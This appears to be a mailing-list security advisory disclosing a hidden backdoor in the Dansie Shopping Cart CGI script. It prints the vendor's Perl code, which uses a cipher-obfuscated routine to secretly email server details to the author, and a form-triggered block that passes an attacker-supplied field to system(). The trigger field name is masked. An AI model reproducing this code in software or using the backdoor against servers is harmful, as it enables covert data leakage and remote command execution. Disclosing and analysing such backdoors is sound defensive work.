<<< Date Index >>>     <<< Thread Index >>>

Dansie Cart Script Exploit Reported



Synopsis : This program -deliberately- allows arbitrary commands to be
          executed on the victim server.


One of our clients, while installing and configuring the Dansie Shopping
Cart, ran into difficulty integrating PGP, the shopping cart program, and
our secure server setup.  While trying to assist our client with the cart
and PGP configuration we discovered a couple of things.

The CGI, under certain conditions, sends an email to the author of the
Dansie shopping cart software, 'tech@xxxxxxxxxx'.  This is not readily
apparent as the code that handles this transaction incorporates a simple
Caesar Cipher to hide the email address. The cipher is handled via the
subroutine 'there2':

------
sub there2
{
   $_ = "$_[0]";
   tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
   tr/_/-/;
   tr/\@/\./;
   return $_;
}
-------

The call that creates this email address and sends the mail is the
function 'there3'.

-------
sub there3
{
   if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
   {
       $a = &there2('8v59')."\@".
&there2('kte3cv').".".
&there2('ev8');
       $b = &there2('8v59_3jhhzi8');
       pop(@there2);
       pop(@there2);
       $c = &there2("@there2");
       open (TECH, "|$mailprog $a");
       print TECH "To: $a\n";
       print TECH "From: $a\n";
       print TECH "Subject: $b\n\n";
       print TECH "$path3\n";
       print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
       print TECH "$c\n";
       print TECH "$e $there\n" if ($e);
       close (TECH);
   }
}
-------

The ciphered strings, when passed through 'there2', result in:

  8v59          == tech
  kte3cv        == dansie
  ev8           == net
  8v59_3jhhzi8  == tech-support
  $a            == tech@xxxxxxxxxx
  $b            == Subject: tech-support

This seems curious, but plausible reasons could include insuring License
compliance, or maybe the cart automatically sends this email when an error
occurs. The program definitely goes out of its way to hide the fact that the
mail is being sent.

While going through the rest of the code we discovered a much more
interesting item.

(We've masked out the actual trigger element with question marks)

----------
if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || (
($FORM{'?????????'} ) && (!$d) ) )
{
   if ( $ENV{'OS'} )
   {
       system("$FORM{'?????????'}");
   }
   else
   {
       open(ELIF,"|$FORM{'?????????'}");
   }
   exit;
}
--------